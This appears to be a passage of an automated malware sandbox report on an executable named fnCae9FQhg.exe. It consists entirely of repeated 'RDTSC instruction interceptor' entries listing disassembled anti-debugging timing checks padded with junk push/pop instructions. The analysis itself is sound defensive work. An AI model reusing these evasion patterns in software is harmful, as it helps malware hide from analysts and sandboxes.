                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2ABB second address: BD2AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2AC0 second address: BD2AD6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1BB4D69EA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F1BB4D69EA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD3617 second address: BD361C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD7255 second address: BD726D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD7864 second address: BD787E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F535h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD787E second address: BD7890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EAEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD8A5F second address: BD8A69 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD9B89 second address: BD9B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD9B8F second address: BD9BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BB4E5F539h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDCC17 second address: BDCC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1BB4D69EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDCC21 second address: BDCC8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1BB4E5F533h 0x0000000e nop 0x0000000f jc 00007F1BB4E5F52Ch 0x00000015 mov dword ptr [ebp+122D26C2h], edx 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+122D2927h], esi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F1BB4E5F528h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f xchg eax, esi 0x00000040 push ecx 0x00000041 jnl 00007F1BB4E5F52Ch 0x00000047 pop ecx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDCC8C second address: BDCC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDED42 second address: BDED46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDDE3C second address: BDDE6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1BB4D69EB5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDED46 second address: BDED4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDDE6B second address: BDDE71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF013 second address: BDF025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jne 00007F1BB4E5F526h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF025 second address: BDF02B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF02B second address: BDF02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF02F second address: BDF033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1C9F second address: BE1CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1CA3 second address: BE1CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1CB6 second address: BE1CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1CBB second address: BE1CC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE2BD2 second address: BE2BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE5E22 second address: BE5E2C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BB4D69EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE5E2C second address: BE5E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1DEC second address: BE1DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1BB4D69EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE2D22 second address: BE2DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F1BB4E5F528h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov bl, D2h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D34C6h], esi 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov ebx, dword ptr [ebp+122D365Eh] 0x0000003f mov eax, dword ptr [ebp+122D0D99h] 0x00000045 sub dword ptr [ebp+122D32A5h], eax 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebp 0x00000050 call 00007F1BB4E5F528h 0x00000055 pop ebp 0x00000056 mov dword ptr [esp+04h], ebp 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc ebp 0x00000063 push ebp 0x00000064 ret 0x00000065 pop ebp 0x00000066 ret 0x00000067 push ebx 0x00000068 mov dword ptr [ebp+122D3349h], esi 0x0000006e pop ebx 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 popad 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE3D45 second address: BE3D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE2DA9 second address: BE2DB3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE3D49 second address: BE3D5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F1BB4D69EACh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE2DB3 second address: BE2DB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE3D5E second address: BE3D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EB8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE7E2A second address: BE7E53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1BB4E5F52Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE3D7A second address: BE3D7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE7E53 second address: BE7E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE7E57 second address: BE7E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE6075 second address: BE6079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BEDB1E second address: BEDB24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BEDB24 second address: BEDB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1BB4E5F526h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BEDB2E second address: BEDB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BEF1ED second address: BEF270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F52Bh 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F1BB4E5F526h 0x00000011 popad 0x00000012 jmp 00007F1BB4E5F535h 0x00000017 push edi 0x00000018 jmp 00007F1BB4E5F532h 0x0000001d jmp 00007F1BB4E5F537h 0x00000022 pop edi 0x00000023 jnp 00007F1BB4E5F52Ah 0x00000029 pushad 0x0000002a popad 0x0000002b push edx 0x0000002c pop edx 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007F1BB4E5F535h 0x00000036 jl 00007F1BB4E5F526h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BEF270 second address: BEF277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B89128 second address: B8912E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8912E second address: B89146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 js 00007F1BB4D69EA6h 0x0000000d pop esi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8C7CA second address: B8C7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF3006 second address: BF300B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF300B second address: BF3011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF317F second address: BF3189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1BB4D69EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF3189 second address: BF319E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F1BB4E5F52Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF319E second address: BF31A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF31A4 second address: BF31A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8411F second address: B8412C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BB4D69EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8412C second address: B84135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF8405 second address: BF8409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF8409 second address: BF8425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF8425 second address: BF842A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF842A second address: BF844D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1BB4E5F528h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F1BB4E5F52Bh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pushad 0x0000001b popad 0x0000001c pop esi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF844D second address: BF8458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F1BB4D69EA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF8458 second address: BF8468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF854F second address: BF8555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BF8555 second address: BF8559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFDD58 second address: BFDD71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFDD71 second address: BFDD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFDD80 second address: BFDD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFDFFE second address: BFE004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE004 second address: BFE037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F1BB4D69EB1h 0x0000000f jmp 00007F1BB4D69EB4h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE197 second address: BFE19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE19E second address: BFE1C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F1BB4D69EA6h 0x00000009 jp 00007F1BB4D69EA6h 0x0000000f pop eax 0x00000010 jmp 00007F1BB4D69EADh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jo 00007F1BB4D69EBBh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE346 second address: BFE34A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE34A second address: BFE350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE4D0 second address: BFE4D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE4D5 second address: BFE4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE778 second address: BFE786 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BFE786 second address: BFE79C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C04BA6 second address: C04BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1BB4E5F537h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C04BC3 second address: C04BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F1BB4D69EA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C04BCE second address: C04BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1BB4E5F526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C037CA second address: C037DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F1BB4D69EA6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C037DB second address: C037ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F1BB4E5F526h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C03A9A second address: C03ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1BB4D69EA6h 0x0000000a jmp 00007F1BB4D69EB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C03ABC second address: C03AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C03AC0 second address: C03AE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 jp 00007F1BB4D69EA6h 0x0000000f jmp 00007F1BB4D69EADh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C03AE3 second address: C03AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0414E second address: C04160 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1BB4D69EACh 0x0000000c je 00007F1BB4D69EA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C04160 second address: C04172 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1BB4E5F52Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C04172 second address: C04176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C04176 second address: C0417A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1D33 second address: BD1D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
